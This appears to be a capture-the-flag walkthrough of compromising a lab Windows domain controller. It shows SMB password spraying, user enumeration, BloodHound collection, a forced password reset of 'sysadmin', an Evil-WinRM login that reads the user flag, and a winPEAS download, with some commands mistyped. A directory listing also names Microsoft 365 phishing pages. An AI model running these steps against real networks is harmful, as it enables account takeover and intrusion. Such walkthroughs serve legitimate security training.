SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:rockyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:rockyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:12345678 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:12345678 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:12345678 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:abc123 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:abc123 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:abc123 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:nicole STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:nicole STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:nicole STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:daniel STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:daniel STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:daniel STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:babygirl STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:babygirl STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:babygirl STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:monkey STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:monkey STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:monkey STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:lovely STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:lovely STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:lovely STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:jessica STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:jessica STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:654321 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:654321 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:654321 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:michael STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:michael STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:ashley STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:ashley STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1

Now, we have to verify if the password discovered is correct with the command you can see below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1"
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1

Let's go to listing is it's possible with the command --shares as you can see below in the screen, then we've to found out the IPC$ and we should be able to discover new users.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1" --shares
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1 
SMB         192.168.88.7    445    CHANGE           [*] Enumerated shares
SMB         192.168.88.7    445    CHANGE           Share           Permissions     Remark
SMB         192.168.88.7    445    CHANGE           -----           -----------     ------
SMB         192.168.88.7    445    CHANGE           ADMIN$                          Remote Admin
SMB         192.168.88.7    445    CHANGE           C$                              Default share
SMB         192.168.88.7    445    CHANGE           IPC$            READ            Remote IPC
SMB         192.168.88.7    445    CHANGE           NETLOGON        READ            Logon server share 
SMB         192.168.88.7    445    CHANGE           SYSVOL          READ            Logon server share 

Let's go to listing is it's possible with the command --rid-brute as you can see below in the screen, then we've to found out the IPC$ and we should be able to discover new users.  
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "alfredo" -p "Password1" --shares --rid-brute             
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1 
SMB         192.168.88.7    445    CHANGE           [*] Enumerated shares
SMB         192.168.88.7    445    CHANGE           Share           Permissions     Remark
SMB         192.168.88.7    445    CHANGE           -----           -----------     ------
SMB         192.168.88.7    445    CHANGE           ADMIN$                          Remote Admin
SMB         192.168.88.7    445    CHANGE           C$                              Default share
SMB         192.168.88.7    445    CHANGE           IPC$            READ            Remote IPC
SMB         192.168.88.7    445    CHANGE           NETLOGON        READ            Logon server share 
SMB         192.168.88.7    445    CHANGE           SYSVOL          READ            Logon server share 
SMB         192.168.88.7    445    CHANGE           498: MEGACHANGE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           500: MEGACHANGE\Administrator (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           501: MEGACHANGE\Guest (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           502: MEGACHANGE\krbtgt (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           512: MEGACHANGE\Domain Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           513: MEGACHANGE\Domain Users (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           514: MEGACHANGE\Domain Guests (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           515: MEGACHANGE\Domain Computers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           516: MEGACHANGE\Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           517: MEGACHANGE\Cert Publishers (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           518: MEGACHANGE\Schema Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           519: MEGACHANGE\Enterprise Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           520: MEGACHANGE\Group Policy Creator Owners (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           521: MEGACHANGE\Read-only Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           522: MEGACHANGE\Cloneable Domain Controllers (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           525: MEGACHANGE\Protected Users (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           526: MEGACHANGE\Key Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           527: MEGACHANGE\Enterprise Key Admins (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           553: MEGACHANGE\RAS and IAS Servers (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           571: MEGACHANGE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           572: MEGACHANGE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           1000: MEGACHANGE\CHANGE$ (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           1101: MEGACHANGE\DnsAdmins (SidTypeAlias)
SMB         192.168.88.7    445    CHANGE           1102: MEGACHANGE\DnsUpdateProxy (SidTypeGroup)
SMB         192.168.88.7    445    CHANGE           1103: MEGACHANGE\alfredo (SidTypeUser)
SMB         192.168.88.7    445    CHANGE           1104: MEGACHANGE\sysadmin (SidTypeUser)

This is the part more important because we should verify if it is possible enter in the machine for it should execute this command you can see below which is:
netexec smb win-rm 192.168.88.8 -u 'alfredo' -p 'Password1'
┌──(root㉿kali)-[/home/luis]
└─# netexec smb evil-winrm  192.168.88.7 -u "alfredo" -p "Password1"                     
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\alfredo:Password1 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Now, we should be able to try if we can enter in the windows machine, for it, should execute this command you can see below which is:
evil-winrm -i  192.168.88.8 -u 'alfredo' -p 'Password1' 
As with the user alfredo we have not able to enter because maybe this user has not perms as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# evil-winrm  -i 192.168.88.7 -u "alfredo" -p "Password1"
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

Now, we have to go to path C:/home/luis/Descargas/bloodhound.py as you can see below

┌──(root㉿kali)-[/home/luis]
└─# cd Descargas
                                                                                                                              
┌──(root㉿kali)-[/home/luis/Descargas]
└─# ls
BloodHound.py                        m365_gophish_landing                   ngrok_recovery_codes.txt
email_template_ngrok_microsoft.html  m365_gophish_landing.zip               setup_nophish_365.sh
httrack_index_with_form.html         m365_landing_final.html                SharpHound_v2.6.7_windows_x86
kerbrute_linux_386                   m365_login_gophish.html                SharpHound_v2.6.7_windows_x86.zip
landing_page_ngrok_microsoft.html    microsoft365_no_background.html        Spotify-Premium-File-Spotifyinfo.app.apk
m365_capture_and_redirect.html       microsoft365_phishing_simulation.html  twilio_2FA_recovery_code.txt

┌──(root㉿kali)-[/home/luis/Descargas]
└─# cd BloodHound.py           

Now, we have to execute python3 bloodhound.py to recollected information about of windows server, but firtsly we need use -h option to see what options we should use.                                                                                                                          

┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# ls
bloodhound  bloodhound.py  createforestcache.py  Dockerfile  LICENSE  README.md  setup.py

┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# python3 bloodhound.py -h   
usage: bloodhound.py [-h] [-c COLLECTIONMETHOD] [-d DOMAIN] [-v] [-u USERNAME] [-p PASSWORD] [-k] [--hashes HASHES]
                     [-no-pass] [-aesKey hex key] [--auth-method {auto,ntlm,kerberos}] [-ns NAMESERVER] [--dns-tcp]
                     [--dns-timeout DNS_TIMEOUT] [-dc HOST] [-gc HOST] [-w WORKERS] [--exclude-dcs] [--disable-pooling]
                     [--disable-autogc] [--zip] [--computerfile COMPUTERFILE] [--cachefile CACHEFILE]
                     [--ldap-channel-binding] [--use-ldaps] [-op PREFIX_NAME]

Python based ingestor for BloodHound LEGACY
For help or reporting issues, visit https://github.com/dirkjanm/BloodHound.py

options:
  -h, --help            show this help message and exit
  -c, --collectionmethod COLLECTIONMETHOD
                        Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default (all previous),
                        DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, Container, ObjectProps, ACL, All
                        (all except LoggedOn). You can specify more than one by separating them with a comma. (default:
                        Default)
  -d, --domain DOMAIN   Domain to query.
  -v                    Enable verbose output

authentication options:
  Specify one or more authentication options. 
  By default Kerberos authentication is used and NTLM is used as fallback. 
  Kerberos tickets are automatically requested if a password or hashes are specified.

  -u, --username USERNAME
                        Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
  -p, --password PASSWORD
                        Password
  -k, --kerberos        Use kerberos ccache file
  --hashes HASHES       LM:NLTM hashes
  -no-pass              don't ask for password (useful for -k)
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  --auth-method {auto,ntlm,kerberos}
                        Authentication methods. Force Kerberos or NTLM only or use auto for Kerberos with NTLM fallback

collection options:
  -ns, --nameserver NAMESERVER
                        Alternative name server to use for queries
  --dns-tcp             Use TCP instead of UDP for DNS queries
  --dns-timeout DNS_TIMEOUT
                        DNS query timeout in seconds (default: 3)
  -dc, --domain-controller HOST
                        Override which DC to query (hostname)
  -gc, --global-catalog HOST
                        Override which GC to query (hostname)
  -w, --workers WORKERS
                        Number of workers for computer enumeration (default: 10)
  --exclude-dcs         Skip DCs during computer enumeration
  --disable-pooling     Don't use subprocesses for ACL parsing (only for debugging purposes)
  --disable-autogc      Don't automatically select a Global Catalog (use only if it gives errors)
  --zip                 Compress the JSON output files into a zip archive
  --computerfile COMPUTERFILE
                        File containing computer FQDNs to use as allowlist for any computer based methods
  --cachefile CACHEFILE
                        Cache file (experimental)
  --ldap-channel-binding
                        Use LDAP Channel Binding (will force ldaps protocol to be used)
  --use-ldaps           Use LDAP over TLS on port 636 by default
  -op, --outputprefix PREFIX_NAME
                        String to prepend to output file names

In addition, we have to use this command as you can see below:
 python3 bloodhound.py -u alfredo -p Password1 -ns 192.168.88.7 -d megachange.nyx -c all --zip
┌──(root㉿kali)-[/home/luis/Descargas/BloodHound.py]
└─# python3 bloodhound.py -u alfredo -p Password1 -ns 192.168.88.7 -d megachange.nyx -c all --zip   
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: megachange.nyx
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (change.megachange.nyx:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: change.megachange.nyx
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: change.megachange.nyx
INFO: Found 6 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CHANGE.megachange.nyx
INFO: Done in 00M 01S
INFO: Compressing output into 20250628122018_bloodhound.zip

Let's go to execute bloodhound as you can see below.

$ bloodhound
[sudo] contraseña para luis: 
Lo siento, pruebe otra vez.
[sudo] contraseña para luis: 

 Starting neo4j
Neo4j is running at pid 44002

 Bloodhound will start

 IMPORTANT: It will take time, please wait...

{"time":"2025-06-28T12:23:58.548655376+02:00","level":"INFO","message":"Reading configuration found at /etc/bhapi/bhapi.json"}
{"time":"2025-06-28T12:23:58.551425365+02:00","level":"INFO","message":"Logging configured"}
{"time":"2025-06-28T12:23:58.671781512+02:00","level":"INFO","message":"No database driver has been set for migration, using: neo4j"}
{"time":"2025-06-28T12:23:58.672086453+02:00","level":"INFO","message":"Connecting to graph using Neo4j"}
{"time":"2025-06-28T12:23:58.673871659+02:00","level":"INFO","message":"Starting daemon Tools API"}
{"time":"2025-06-28T12:23:58.72409862+02:00","level":"INFO","message":"No new SQL migrations to run"}
{"time":"2025-06-28T12:24:01.455917634+02:00","level":"ERROR","message":"Error generating AzureHound manifest file: error reading downloads directory /etc/bloodhound/collectors/azurehound: open /etc/bloodhound/collectors/azurehound: no such file or directory"}
{"time":"2025-06-28T12:24:01.456065911+02:00","level":"ERROR","message":"Error generating SharpHound manifest file: error reading downloads directory /etc/bloodhound/collectors/sharphound: open /etc/bloodhound/collectors/sharphound: no such file or directory"}
{"time":"2025-06-28T12:24:01.496402594+02:00","level":"INFO","message":"Analysis requested by init"}
{"time":"2025-06-28T12:24:01.508134041+02:00","level":"INFO","message":"Starting daemon API Daemon"}
{"time":"2025-06-28T12:24:01.508499026+02:00","level":"INFO","message":"Starting daemon Data Pruning Daemon"}
{"time":"2025-06-28T12:24:01.508934397+02:00","level":"INFO","message":"Starting daemon Data Pipe Daemon"}
{"time":"2025-06-28T12:24:01.509675838+02:00","level":"INFO","message":"Server started successfully"}
{"time":"2025-06-28T12:24:01.519671401+02:00","level":"INFO","message":"Running OrphanFileSweeper for path /var/lib/bhe/work/tmp"}
{"time":"2025-06-28T12:24:02.463310335+02:00","level":"INFO","message":"GET /","proto":"HTTP/1.1","referer":"","user_agent":"curl/8.14.1","request_bytes":0,"response_bytes":38,"status":301,"elapsed":2.084736,"request_id":"6228bb9b-c13a-4262-9b39-3b52b723504b","request_ip":"127.0.0.1","remote_addr":"127.0.0.1:55178"}

http://127.0.0.1:8080

Now we have to do the next steps with the screenshots.

In addition, we have the perm which we can change the password to sysadmin and we should be able to do
with this command which you can see below:
net rpc password "sysadmin" "Password123" -U "megachange.nyx"/"alfredo"%"Password1" -S "192.168.88.7"
┌──(luis㉿kali)-[~]

└─$ net rpc password "sysadmin" "Password123" -U "megachange.nyx"/"alfredo"%"Password1" -S "192.168.88.7"

Now, we have to verify if the password discovered is correct with the command you can see below.

┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u sysadmin -p Password123
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\sysadmin:Password123 

This is the part more important because we should verify if it is possible enter in the machine for it should execute this command you can see below which is:
netexec smb win-rm 192.168.88.7 -u 'sysadmin' -p 'Password123!'
┌──(root㉿kali)-[/home/luis]
└─# netexec smb evil-winrm 192.168.88.7 -u sysadmin -p Password123
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\sysadmin:Password123 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Now, we should be able to try if we can enter in the windows machine, for it, should execute this command you can see below which is:
evil-winrm -i  192.168.88.8 -u 'sysadmin' -p 'Password123' 

┌──(root㉿kali)-[/home/luis]
└─# evil-winrm -i 192.168.88.7 -u sysadmin -p Password123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Now we have to execute the shell to obtain the user flag and root flag, but firstly we have to enter as system32 as you can see below.

cd (to change directory)
ls (to listing folders,files etc)
cd Desktop (to change Desktop directory)                                        

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sysadmin\Documents> cd ..
*Evil-WinRM* PS C:\Users\sysadmin> ls


    Directory: C:\Users\sysadmin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:29 PM                Desktop
d-r---         3/7/2025   4:01 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\sysadmin> cd Desktop
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> ls

Gotcha! I have to discovered the user flag you can see below in this path which is:
C:\Users\sysadmin\Desktop\user.txt

    Directory: C:\Users\sysadmin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/7/2025   6:21 PM             70 user.txt

*Evil-WinRM* PS C:\Users\sysadmin\Desktop> type user.txt
01c920617c6470cdf46ba5861ce701c2
*Evil-WinRM* PS C:\Users\sysadmin\Desktop>
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> whoami
megachange\sysadmin
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> cd ..
*Evil-WinRM* PS C:\Users\sysadmin> ls


    Directory: C:\Users\sysadmin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:29 PM                Desktop
d-r---         3/7/2025   4:01 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\sysadmin> cd ..
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/7/2025   7:11 PM                Administrator
d-r---         3/7/2025   3:38 AM                Public
d-----         3/7/2025   4:01 PM                sysadmin

*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> ls
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Gotcha! we have to be able to enter into the machine and then start privilege scalation, so we have to discover privileges in this machine with this user for it, we have to execute this commands which you can see below because PermissionDenied.

*Evil-WinRM* PS C:\Users\Administrator> 

Now we have to go to this clink and download and obtain privileges:

 https://github.com/peass-ng/PEASS-ng/releases/tag/20250601-88c7a0f6
┌──(root㉿kali)-[/home/luis/Descargas]
└─# wget https://github.com/peass-ng/PEASS-ng/releases/download/20250601-88c7a0f6/winPEASx64_ofs.exe
--2025-06-28 12:42:24--  https://github.com/peass-ng/PEASS-ng/releases/download/20250601-88c7a0f6/winPEASx64_ofs.exe
Resolviendo github.com (github.com)... 140.82.121.4
Conectando con github.com (github.com)[140.82.121.4]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ca7b33a7-72bd-4039-a878-8d8946997c34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T104236Z&X-Amz-Expires=1800&X-Amz-Signature=1fa15f96d69d5d2e2630a6016b9ba111951556b2719992182bbd785981957ddd&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DwinPEASx64_ofs.exe&response-content-type=application%2Foctet-stream [siguiendo]
--2025-06-28 12:42:25--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ca7b33a7-72bd-4039-a878-8d8946997c34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T104236Z&X-Amz-Expires=1800&X-Amz-Signature=1fa15f96d69d5d2e2630a6016b9ba111951556b2719992182bbd785981957ddd&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DwinPEASx64_ofs.exe&response-content-type=application%2Foctet-stream
Resolviendo objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Conectando con objects.githubusercontent.com (objects.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 10010624 (9,5M) [application/octet-stream]
Grabando a: «winPEASx64_ofs.exe»

winPEASx64_ofs.exe              100%[=====================================================>]   9,55M  33,6MB/s    en 0,3s    

2025-06-28 12:42:26 (33,6 MB/s) - «winPEASx64_ofs.exe» guardado [10010624/10010624]

As the file has been downloaded we should enter again into the machine and upload there as you can see below with this command.

┌──(root㉿kali)-[/home/luis/Descargas]
└─# evil-winrm -i 192.168.88.7 -u sysadmin -p Password123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
